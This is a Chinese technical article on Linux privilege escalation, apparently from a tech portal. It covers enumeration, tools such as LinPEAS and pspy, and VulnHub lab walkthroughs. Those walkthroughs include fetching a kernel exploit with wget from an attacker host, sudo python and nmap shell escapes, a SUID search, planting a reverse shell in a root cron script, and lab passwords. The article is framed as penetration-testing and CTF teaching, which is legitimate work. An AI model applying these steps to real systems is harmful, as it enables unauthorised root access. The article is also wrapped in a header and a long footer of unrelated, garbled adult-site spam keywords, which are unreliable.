国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Linux提權(quán)過程中的各種姿勢

開發(fā) 前端
提權(quán)過程中的信息收集相當(dāng)于是一個手動枚舉的過程, 涉及對系統(tǒng)配置和服務(wù)信息進(jìn)行詳細(xì)的查看和收集, 在此過程中, 往往需要記錄盡可能多的信息, 其中有些看似不重要的信息即使現(xiàn)在用不到, 在后期往往能提供非常有價值的靈感和思路。

1.關(guān)于提權(quán)

系統(tǒng)提權(quán)通常是滲透測試或CTF比賽中遇到的關(guān)鍵步驟, 通過提權(quán)可以允許攻擊者執(zhí)行一些特殊操作,例如:繞過訪問控制、更改密碼、創(chuàng)建新用戶作為持久化手段、對軟件進(jìn)行更改等。具有root權(quán)限的用戶則可以對系統(tǒng)進(jìn)行任何操作, 包括:讀、寫或刪除任何文件、停止或啟動服務(wù)、安裝或卸載應(yīng)用程序及管理賬戶等。

2.提權(quán)過程中的信息收集

提權(quán)過程中的信息收集相當(dāng)于是一個手動枚舉的過程, 涉及對系統(tǒng)配置和服務(wù)信息進(jìn)行詳細(xì)的查看和收集, 在此過程中, 往往需要記錄盡可能多的信息, 其中有些看似不重要的信息即使現(xiàn)在用不到, 在后期往往能提供非常有價值的靈感和思路。

2.1 查看系統(tǒng)內(nèi)核版本

如果發(fā)現(xiàn)具有可用漏洞的內(nèi)核版本, 則可以使用它來獲取root shell, 可以使用以下命令查看內(nèi)核版本:

$ uname -r

命令返回如圖:

圖片圖片

如果安裝了LSB模塊, 則可以使用命令查看Linux版本, 命令如下:

$ lsb_release -a

假如沒有該命令, 可以使用以下命令查看:

$ cat /proc/version

命令返回結(jié)果如下:

圖片圖片

2.2 Sudo版本

跟內(nèi)核版本一樣, sudo版本也可能受到攻擊, 可以使用以下命令查看:

$ sudo -V

命令返回結(jié)果如下:

圖片圖片

2.3 歷史記錄

使用history命令可以查看系統(tǒng)曾經(jīng)運(yùn)行的命令歷史記錄, 在這個過程中往往能夠找到一些有價值的信息,例如:系統(tǒng)密碼,如圖:

圖片圖片

2.4 計(jì)劃任務(wù)

可以使用命令查看系統(tǒng)中間隔時間運(yùn)行的程序, 在這個過程中可能會發(fā)現(xiàn)一些意外的信息,如圖:

圖片圖片

2.5 sudo信息

在Linux權(quán)限提升過程中, 查看用戶當(dāng)前擁有的sudo權(quán)限, 可以提示我可能使用sudo能夠運(yùn)行某些命令, 輸入以下命令:

$ sudo -l

命令返回結(jié)果如下:

圖片圖片

2.6 檢查身份

可以直接使用id命令查看當(dāng)前用戶屬于哪些組, 如圖:

圖片圖片

2.7 檢查網(wǎng)絡(luò)信息

查看網(wǎng)絡(luò)信息可以為下一步行動提供豐富的信息,例如: 路由信息、IP地址等, 根據(jù)這些信息對于之后理清整個網(wǎng)絡(luò)拓?fù)浣Y(jié)構(gòu)非常有幫助, 命令執(zhí)行結(jié)果如下:

圖片圖片

3.自動化工具

在Linux系統(tǒng)中使用自動化工具可以大大提升整體效率, 以下是一些常見的枚舉工具。

3.1 LinEnum

LinEnum是一款流行的權(quán)限提升工具, 它能夠顯示有關(guān)Linux系統(tǒng)的信息, 這些信息有價值的地方在于它們可能具有潛在的漏洞、錯誤配置, 大大提高提權(quán)的成功幾率。

圖片圖片

LinEnum收集的信息包括:用戶賬戶、文件權(quán)限、活動進(jìn)程、已安裝的軟件包、網(wǎng)絡(luò)配置、計(jì)劃任務(wù)、系統(tǒng)日志、版本信息等。

3.2 LinPEAS

LinPEAS也是一個流行的提權(quán)腳本, 可以幫助我生成root shell的潛在路徑, 并協(xié)助發(fā)現(xiàn)Linux環(huán)境中權(quán)限的錯誤配置或漏洞。

圖片圖片

LinPEAS使用顏色編碼系統(tǒng)突出顯示哪些特權(quán)升級維度最可能發(fā)揮作用, 如果出現(xiàn)紅色/黃色, 則應(yīng)該優(yōu)先關(guān)注。

3.3 Pspy工具

Pspy是一個命令行工具, 該工具可以無需root權(quán)限監(jiān)控Linux系統(tǒng)中運(yùn)行的進(jìn)程。

該工具對于識別cron作業(yè)或其他計(jì)劃任務(wù)運(yùn)行的進(jìn)程特別有用, 這些進(jìn)程通常是特權(quán)升級攻擊的目標(biāo)。通過識別這些進(jìn)程,滲透測試人員可以找到利用錯誤配置或漏洞的機(jī)會,從而使攻擊者能夠在系統(tǒng)上獲得更高的權(quán)限。

圖片圖片

3.4 Linux Exploit Suggester

Linux Exploit Suggester是一個Linux權(quán)限提升工具,用于檢查計(jì)算機(jī)是否存在潛在的內(nèi)核漏洞。該工具使用“極有可能”、“可能”、“不太可能”和“不可能”分?jǐn)?shù)來計(jì)算漏洞利用成功的可能性。

圖片圖片

3.5 Linux Smart Enumeration

Linux Smart Enumeration是另一個類似于LinPEAS 的工具。它旨在識別系統(tǒng)漏洞、錯誤配置和其他潛在的系統(tǒng)權(quán)限升級途徑。然而,LSE以其獨(dú)特的檢查“級別”而聞名,它允許用戶根據(jù)自己的需要指定枚舉的深度。

它具有三個詳細(xì)級別。默認(rèn)情況下,系統(tǒng)會顯示最嚴(yán)重的安全漏洞。執(zhí)行第1級會顯示有用的信息,可以幫助滲透測試人員升級權(quán)限。執(zhí)行級別2將提供收集的所有系統(tǒng)數(shù)據(jù)的大量轉(zhuǎn)儲。

圖片圖片

4.利用內(nèi)核漏洞提權(quán)

內(nèi)核漏洞是利用Linux操作系統(tǒng)內(nèi)核代碼中的錯誤或缺陷, 例如:緩沖區(qū)溢出。為了能夠證明利用內(nèi)核漏洞提升權(quán)限并生成root shell確實(shí)有效, 這里使用了VulnHub的Kioptrix 1.1虛擬機(jī)。

當(dāng)以普通用戶進(jìn)入目標(biāo)機(jī)器后, 首先還是通過lsb_release -a 命令查看內(nèi)核版本, 如圖:

圖片圖片

從上圖中可以看出, 這臺機(jī)器運(yùn)行的是CentOS, 內(nèi)核版本為:2.6.9, 下一步使用searchsploit命令查找漏洞, 完整命令如下:

$ searchsploit linux CentOS 2.6 privilege escalation

圖片

上圖中顯示的9545.c將是我們利用的目標(biāo), 但必須將代碼從Kali傳輸?shù)轿业哪繕?biāo)機(jī)器并編譯成可執(zhí)行文件。

接下來我在Kali機(jī)器上啟動一個Python服務(wù)器, 并通過Kioptrix 機(jī)器上的wget下載漏洞利用程序。以下命令將在端口 8000 上啟動 Python 服務(wù)器。確保在漏洞所在的同一文件夾中啟動服務(wù)器。

python3 -m http.server

圖片圖片

圖片圖片

下面我可以使用wget命令將漏洞利用程序下載到Kioptrix,命令如下:

wget http://192.168.56.103:8000/9545.c

下載完成后, 使用以下命令編譯代碼:

gcc 9545.c -o privesc

圖片圖片

最終利用內(nèi)核漏洞獲取到root shell權(quán)限。

5.利用服務(wù)漏洞提權(quán)

服務(wù)漏洞主要是利用系統(tǒng)或應(yīng)用程序服務(wù)中的漏洞達(dá)到提權(quán)目的。這些服務(wù)通常是向其他程序或用戶提供特定功能的后臺程序,包括: Web服務(wù)器、數(shù)據(jù)庫服務(wù)器、電子郵件服務(wù)器等。

服務(wù)漏洞利用的過程涉及攻擊者控制服務(wù)中的漏洞個來執(zhí)行惡意代碼, 根據(jù)具體的漏洞和所涉及的服務(wù), 成功利用的結(jié)果可能會有很大差異。

下面是一個利用的案例, 看看在VulnHub的Raven2 VM中利用服務(wù)漏洞進(jìn)行root訪問是一種怎樣的體驗(yàn)。

當(dāng)我通過反彈shell進(jìn)入了目標(biāo)系統(tǒng), 便可以進(jìn)行一些枚舉操作來查找任何潛在的漏洞。

現(xiàn)在我已經(jīng)擁有位于wp_config文件中的MySQL憑據(jù), 接著運(yùn)行LinPeas工具, 看看能否找到任何可能的特權(quán)路徑。

觀察LinPeas提供的輸出內(nèi)容, 我發(fā)現(xiàn)MySQL正在以root身份運(yùn)行, 如圖:

圖片圖片

祭出搜索引擎, 看看該版本的MySQL是否有可用的漏洞,如圖:

圖片圖片

看上去運(yùn)氣不錯, 有一個名為udf_root的潛在的權(quán)限提升服務(wù)漏洞可以利用,該漏洞利用MySQL中的UDF(用戶定義函數(shù)是一段擴(kuò)展MySQL服務(wù)器功能代碼)以MySQL服務(wù)的權(quán)限執(zhí)行系統(tǒng)命令, 最終獲取系統(tǒng)權(quán)限。

該漏洞利用會將/bin/sh復(fù)制到臨時文件夾, 將所有者設(shè)置為root, 然后在/bin/sh二進(jìn)制文件中設(shè)置SUID權(quán)限, 從而提供root shell。

將udf_root腳本下載到我本地Kali機(jī)器上, 將其重命名為ravenprivesc.py, 通過執(zhí)勤啟動的Python服務(wù)器并使用wget命令將其下載到Raven機(jī)器上, 如圖:

圖片圖片

結(jié)合之前MySQL的登錄憑據(jù), 即:用戶名:root, 密碼:R@v3nSecurity, 運(yùn)行一下試試:

圖片圖片

成功獲取到root權(quán)限。

6.利用Sudo權(quán)限提權(quán)

在Linux系統(tǒng)中, sudo代表超級用戶執(zhí)行操作, 該命令允許普通用戶以超級用戶(root)的安全權(quán)限執(zhí)行某些命令。sudo的主要目的是將root權(quán)限限制在真正需要的時候。

對于攻擊者來說, 利用sudo規(guī)則, 可以獲得提權(quán)并操作一些命令,例如: cat、find或python。

下面我使用sudo -l命令來查看sudo權(quán)限:

圖片圖片

從上圖中可以看出, 可以使用sudo權(quán)限運(yùn)行python, 而無需提供密碼。

下面執(zhí)行該命令:

sudo python -c 'import os; os.system("/bin/sh")'

圖片圖片

從上圖看到,直接獲取到了root權(quán)限。

7.利用SUID提權(quán)

SUID代表設(shè)置所有者用戶ID, SUID允許用戶以與文件所有者相同的權(quán)限運(yùn)行可執(zhí)行文件。例如:如果文件設(shè)置了SUID位, 則標(biāo)準(zhǔn)用戶可以使用root權(quán)限執(zhí)行該文件。

SUID權(quán)限可以使用帶有四個前綴的chmod命令(例如:chmod 4755 文件名)來設(shè)置, 并且可以在ls -l中用s代替用戶執(zhí)行權(quán)限。

可以輸入以下命令進(jìn)行手動檢查SUID:

find / -type f -perm -04000 -ls 2>/dev/null

圖片圖片

也可以使用LinPeas檢查SUID文件,如圖:

圖片圖片

如上圖, 利用Nmap命令設(shè)置SUID位來幫助我提升權(quán)限。可以從這個網(wǎng)站:https://gtfobins.github.io/gtfobins/nmap/#suid找到相關(guān)操作的詳細(xì)過程。

使用--interactive標(biāo)志運(yùn)行Nmap將來交互模式下啟動它, 而!sh會在交互模式下生成一個shell, 由于Nmap上設(shè)置了SUID位, 因此shell將以root權(quán)限運(yùn)行。

圖片圖片

8.計(jì)劃任務(wù)提權(quán)

Linux中的計(jì)劃任務(wù)是按預(yù)定義的時間或間隔運(yùn)行的操作, 它們用于自動執(zhí)行重復(fù)性任務(wù), 以便無需人工干預(yù)即可完成這些任務(wù)。

如果計(jì)劃任務(wù)以更高權(quán)限運(yùn)行, 例如:root cron作業(yè), 并且如果它被錯誤配置為執(zhí)行普通用戶可寫的文件或腳本, 這樣就可以修改此文件或腳本來包含惡意命令, 從而導(dǎo)致權(quán)限升級計(jì)劃任務(wù)執(zhí)行。

這里我采用了VulnHub中的Symfonos3 VM來查看計(jì)劃任務(wù), 首先還是利用Python創(chuàng)建一個http服務(wù),輸入命令:

python3 -m http.server

圖片圖片

這里可以使用wget命令從服務(wù)器下載pspy, 只要確保使用本機(jī)IP 即可:

wget http://192.168.110.136:8000/pspy64

圖片圖片

接著運(yùn)行:./pspy64, 讓pspy運(yùn)行幾分鐘, 這時可以看到一個名為ftpclient.py的進(jìn)程在定時運(yùn)行, 如圖:

圖片圖片

研究一下該文件, 看看是否可以以某種方式在它后面附加一些代碼來生成反彈Shell,如圖:

圖片圖片

這里我沒有ftpclient.py文件的寫入權(quán)限, 但我注意到該文件正在導(dǎo)入ftplib, 不妨嘗試將其寫入該文件中試試,如圖:

圖片圖片

由于是"gods"組的一部分,因此擁有該文件的讀寫權(quán)限, 我可以給這個文件附加一個shell, 等待計(jì)劃任務(wù)執(zhí)行, 這時應(yīng)該稱為root用戶了, 如圖:

圖片圖片

回到kali機(jī)器上,看看結(jié)果:

圖片圖片

9.利用密碼提權(quán)

當(dāng)涉及到Linux權(quán)限提升時, 成為root用戶最簡單的方法之一就是查找密碼, 攻擊者可能會使用多種方法來查找系統(tǒng)中的密碼。

Linux用戶可以以純文本形式存儲密碼, 如果這些文件沒有得到適當(dāng)保護(hù), 攻擊者可能會訪問用戶的賬戶。

一旦找到密碼, 攻擊者就可以使用它來提升權(quán)限, 方法是登錄更高權(quán)限的賬戶或?qū)⑵渑csudo一起使用以提升權(quán)限運(yùn)行命令。

下面將使用VulnHub中的SickOS VM來實(shí)現(xiàn)這個場景, 首先輸入以下命令查看密碼:

cat /etc/passwd

圖片圖片

從圖中可以看到, 有一個用戶較sickos, 下一步搜索以純文本形式存儲的密碼, 可以使用以下命令來搜索包含字符串"pass"的PHP文件:

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

圖片圖片

可以看到, 有一個以明文形式存儲的用戶名root和密碼john@123, 看看是否可以使用找到的密碼切換到sickos用戶, 從社會工程學(xué)角度, 密碼往往會重復(fù)用于多種場合:

圖片圖片

居然可以, 我已將www-data用戶提升為Sickos用戶, 現(xiàn)在順便看看是否有sudo權(quán)限:

sudo -l

圖片圖片

可以看到,已經(jīng)可以以root用戶身份運(yùn)行所有命令。

責(zé)任編輯:武曉燕 來源: 二進(jìn)制空間安全
相關(guān)推薦

2019-12-01 22:34:42

提權(quán)web安全漏洞

2021-01-13 08:14:36

Windows提權(quán)漏洞攻擊

2021-01-06 08:04:30

Linux方式提權(quán)

2019-05-07 10:28:27

2024-07-31 08:46:10

2017-03-25 20:30:15

2009-07-25 17:24:45

2011-03-07 11:36:23

FileZillaSe

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2010-12-10 15:23:49

Linux漏洞

2024-07-31 08:50:20

2013-10-18 10:10:45

Linux漏洞代碼提權(quán)

2009-07-25 16:52:29

2022-03-21 07:56:25

動態(tài)鏈接Linux操作系統(tǒng)

2011-05-03 10:31:59

噴墨打印機(jī)注墨誤區(qū)

2009-07-23 14:10:38

Hibernate J

2013-08-15 12:26:40

阿里云飛天

2010-07-01 14:05:43

SNMPMIB

2011-04-11 17:28:50

oracle存儲select語句

2025-06-25 09:06:18

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

日本一区二区高清视频| av在线天天| 爽爽视频在线观看| 亚洲精品一区| 国产经典欧美精品| 亚洲一区二区久久| 日本国产在线| 福利片在线一区二区| 中文字幕一区二区三区视频| 欧美在线视频观看| 青草久久伊人| 精品亚洲国产成人av制服丝袜| 亚洲视频电影图片偷拍一区| 日本久久久久久久久久久久| 日韩午夜激情| 久久亚洲国产精品| av黄色在线观看| 国产精品欧美久久久久一区二区| 欧美一区二区三区四区在线观看地址| 阿v视频在线观看| 中文一区在线播放| 成人3d动漫一区二区三区91| 人在线成免费视频| 洋洋av久久久久久久一区| 日本一区二区精品| 成人精品一区二区三区电影| 日韩美女精品在线| 亚洲精品欧美极品| 丁香花在线影院| 久久精品免视看| 99国产视频| 国产精品蜜月aⅴ在线| 亚洲日本在线看| 久久久久久九九九九| 激情视频网址| 国产精品xxxav免费视频| 亚洲成人黄色网| 一区二区三区四区欧美| 欧美日韩中出| 亚洲国产精品热久久| www.999av| 日韩一区精品视频| 国产精品无av码在线观看| 亚洲18在线| 亚洲欧美一区二区三区情侣bbw | 色美美综合视频| 亚洲色在线视频| 国产黄视频在线| 欧美xxxx中国| 欧美性猛交xxxxxxxx| 成人污网站在线观看| 精品国产一区二区三区香蕉沈先生| 色一情一伦一子一伦一区| 午夜精品一区二区在线观看的 | 九九在线精品视频| 中文字幕国产精品| 黄页网站免费在线观看| 午夜在线一区二区| 色综合久久精品亚洲国产| 轻轻色免费在线视频| 美女尤物国产一区| 欧美激情国内偷拍| 黄色网页网址在线免费| 91视视频在线直接观看在线看网页在线看| 国产综合精品一区二区三区| 欧美巨大丰满猛性社交| 亚洲国产精品国自产拍av| 久久全球大尺度高清视频| 男人艹女人在线观看| 久久日韩粉嫩一区二区三区| 国产高清一区二区三区视频 | 欧美尤物巨大精品爽| 国产乱理伦片a级在线观看| 亚洲男同1069视频| 女女同性女同一区二区三区91| 中文字幕一区二区三区四区久久| 欧美一级xxx| 日本视频在线播放| 欧美一级国产精品| 成人在线观看av| 国产精品夜夜嗨| 美女做a视频| 亚洲人成网7777777国产| 中文字幕日韩一区二区不卡| 欧美成人精品免费| 欧美日韩国产高清一区二区三区 | 欧美亚洲另类激情另类| 另类图片国产| 深夜福利视频在线免费观看| 中文字幕日韩有码| 国产精品一区毛片| 日韩欧美国产精品一区二区三区| 欧美xxxx在线观看| 澳门成人av| 99国产视频在线| 日产国产欧美视频一区精品| 国产www免费| 亚洲精品综合在线| 高清电影在线免费观看| 欧美精品激情视频| 91麻豆精品国产91久久久平台 | 电影一区二区三| 青青草原一区二区| 久久国产精品亚洲77777| 91激情视频在线| 91精品国产色综合久久久蜜香臀| 电影一区二区| 国产精品裸体一区二区三区| 日韩高清不卡一区二区| 国内一区二区在线视频观看| 久久久999| 99不卡视频| 97色在线视频| 一个色妞综合视频在线观看| 国产午夜久久av| 久久视频在线播放| 亚洲我射av| 国产精品久久久久久亚洲调教| 亚洲欧美大片| 中文字幕欧美日韩一区二区| 91亚洲男人天堂| 国产精品99久久99久久久| 欧美日韩二区三区| 蜜臀av在线播放| 91精品国产一区二区三区香蕉| 国产特黄在线| 一区二区免费看| 亚洲国产日韩一区二区| 国产v亚洲v天堂无码久久久| 日韩视频永久免费| 在线观看的日韩av| 日韩三级电影网| 91精品91久久久久久| 91色porny在线视频| 国产一区二区三区| 成人在线国产视频| 国产一区二区三区三区在线观看| 免费人成在线不卡| 在线观看免费黄色| 国产一区二区在线免费| 中文字幕第一区| 欧美一区一区| 亚洲精品中文字幕无码蜜桃| 亚洲精品小视频| 一区二区日韩欧美| 在线国产三级| 国产精品美女免费看| 国产精品网站在线观看| 日韩护士脚交太爽了| 欧美日韩高清免费| 欧美性大战久久久| 日韩图片一区| 里番在线观看网站| 国产女同一区二区| 国产亚洲精品福利| 性高爱久久久久久久久| 日本成人黄色免费看| 精品一区二区三区在线观看| 日本一本二本在线观看| 色中色一区二区| 2019中文亚洲字幕| 91手机视频在线观看| 国产a级毛片一区| 尤物网在线观看| 久久夜色精品国产亚洲aⅴ| 综合久久综合| 欧美亚洲精品一区二区| 欧美午夜片欧美片在线观看| 欧洲亚洲视频| 99精品人妻少妇一区二区| 中文字幕亚洲无线码a| 日本少妇一区二区| 性开放的欧美大片| 国产成人中文字幕| 99国产一区二区三精品乱码| 成人三级高清视频在线看| 精品国产免费人成电影在线观...| 国产精品伦理在线| 欧美大片91| 九色丨porny丨| 久久久亚洲国产| 99久久精品国产精品久久| 国产99re66在线视频| 日韩欧美一区二区三区久久婷婷| 欧美伊人久久久久久久久影院| 欧美天天视频| 成人高清网站| 一区二区三区视频| www.色综合| 亚洲国产精品成人综合色在线婷婷 | 国产日韩在线视频| 亚洲视频欧美视频| 国产iv一区二区三区| 狠狠躁少妇一区二区三区| 国内精品视频在线播放| 欧美日韩国产一级片| 一区二区三区视频播放| 黄色a级片免费| 国产精品678| 亚洲日本va在线观看|